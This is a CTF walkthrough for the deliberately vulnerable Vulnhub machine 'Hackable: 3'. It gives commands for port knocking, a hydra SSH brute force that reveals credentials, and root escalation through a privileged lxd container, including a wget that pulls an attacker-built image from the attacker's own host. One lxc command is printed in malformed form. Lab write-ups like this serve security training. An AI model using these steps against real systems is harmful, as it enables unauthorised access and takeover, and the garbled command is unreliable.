Hackable: 3, Vulnhub medium machine was created by Elias Sousa and can be downloaded here.This lab is designed for experienced CTF players who want to put their abilities to the test. We used the machine in the way that it was designed. Also, if you haven’t checked the machine or are having problems, you can attempt every approach you know. The key is port knocking, so let’s get started and discover how to split things down into digestible chunks.

Pentesting Methodology

Network Scanning

• netdiscover
• nmap

Enumeration

• abusing http
• dirb
• wordlist
• port knocking

Exploitation

• hydra
• ssh
• user flag
• linpeas

Privilege Escalation

• lxd
• root flag

Level: Medium

Network Scanning

To begin with, we must use the netdiscover command to scan the network for the IP address of the victim machine.

netdiscover

Our IP address is 192.168.1.185.

To move forward in this process, we are launching Nmap. For open port enumeration.

nmap -sC -sV 192.168.1.185

 According to Nmap, we have an SSH server operating on port 22 and an HTTP service (Apache Server) running on port 80.

Enumeration

First, we’ll attempt to use HTTP. Let’s look at port 80 and see if anything interesting comes up. We can immediately verify it in the browser because the Apache Server is listening on port 80.

w

Nothing in-trusting on the main page. As a result, we examined its source code and discovered some information that will be valuable in this lab.

• We received a link to the login page.
• We chose the username “jubiscleudo.”
• We have gotten a hint that this lab requires port knocking.

To find out more about this laboratory. To uncover certain hidden directory paths, we execute a dirb directory scan.

dirb http://192.168.1.185/

Let’s look through a lot of trustworthy directories, so let’s look through them one by one.

So, let’s have a look at the first result backup directory. We obtained a word list file that might be valuable in the future.

As a result, we run the wget command to download this word list to our machine.

wget http://192.168.1.185/backup/wordlist.txt

Let’s look at the second config directory; we found a file called 1.txt. We ran this file through the browser and discovered some essential but mysterious context.

As a result, we attempt to decode this text using the following command.We received our first text of port knocking after recovering the initial text (10000).

echo MTAwMDA= | base64 -d

When we checked the third one (CSS directory), we got another text file called 2.txt. where we obtained an enumeration of brain fucks.

So, we checked the brain fuck decoder online and recovered the second context (4444) of port knocking activity by providing them with our text.

Now we have two port knocking contexts: 10000 and 4444. Remember that we obtained a link to a login page earlier? We immediately checked that URL but found nothing interesting. So, we looked at the source code. We found an image called 3.jpg that might provide some insight into the problem.

We looked at that image, but there was nothing unusual about it. We’ll have to think beyond the box.

It might have something, so we considered steghide, which could be useful in certain situations. For our image file, we now provide the steghide tool. Hurray!! We received a top-secret text file.

steghide extract -sf 3.jpg

To explore this file, we use the cat command. Congratulations!! 65535 is our third context of port knocking.

cat steganopayload48505.txt

We’re now ready to perform port knocking. We’re good to go if we use this command in conjunction with our context.

knock 192.168.1.185 10000 4444 65535

We run a nmap scan after port knocking to see what results we get. As you can see, the ssh port has been opened.

nmap -sV 192.168.1.185

Exploitation

Now we’re ready to attempt exploitation using the information we gained from previous outcomes, including a user name gained from source code. Let’s try a brute force attack with the word list we stored for later.

Let’s use the hydra tool to begin a brute force attack. Bingo!! We have a username (jubiscleudo) and a password (onlymy).

hydra -l jubiscleudo -P wordlist.txt 192.168.1.185 ssh

Now let’s use the credentials we received from the brute-force attack to log into ssh. Hurray!! The user jubiscleudo was successfully logged in. We instantly examined its id, then used the cat command to reveal the hidden user flag.

ssh [email protected]
id
ls -la
cat .user.txt

After all of this, we require another clue in order to get further into this machine. As a result, we employ the linpeas script to uncover some more buried data. More information about this script may be found here.

In a matter of seconds, we received another set of credentials for the user hackable_3 in a matter of seconds.

Privilege Escalation

Let’s get this party started by changing the user to hackable_3. Then, after checking its user id, we discovered that it was potentially vulnerable to lxd. As a result, we can use lxd privilege escalation to gain root access.

su hackable_3
id

Privilege escalation via lxd necessitates the use of a local account, which we already have. To escalate the root privileges of the host system, we must first generate an image for lxd, which requires the following steps:

Steps must be taken on the host machine are as follows:

• Take a look at the alpine image.
• Import an image into lxd.
• Create a new container to hold the image.
• The container should be mounted in the /root

So, we downloaded the build alpine using the reference of our article from here.

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

We use a simple python http server to transfer this file to the victim’s machine. On the other hand, we will download the alpine-image to the victim machine’s /tmp directory.

wget 192.168.1.3:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz

After the image has been created, it may be added to LXD as an image as follows:

lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage

Use the list command to check the list of images.

lxc image list

We receive an error message stating that we do not have a storage pool. As a result, we must create one. We can use default settings in this case.

lxd init

After that, I proceeded as follows, continuing from the previous failed step.

lxc init myimage ignite -c security.privileged=true
lxc config device and ignite mydevice disk source=/path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

 Navigate to /mnt/root to see all resources from the host machine once inside the container.

After we have run the bash script. We can see that we have a different shell, which is the container’s shell. This container contains all of the host machine’s files. As a result, we enumerated the area in search of the flag and discovered it.

cat root.txt

This was an excellent lab with a lot of information, particularly in the enumeration and privilege escalation sections. It is worthwhile to try to obtain some CTF experience. Hopefully, you guys will learn something new from this walkthrough.

Author: Shubham Sharma is a passionate Cybersecurity Researcher, contact LinkedIn and Twitter.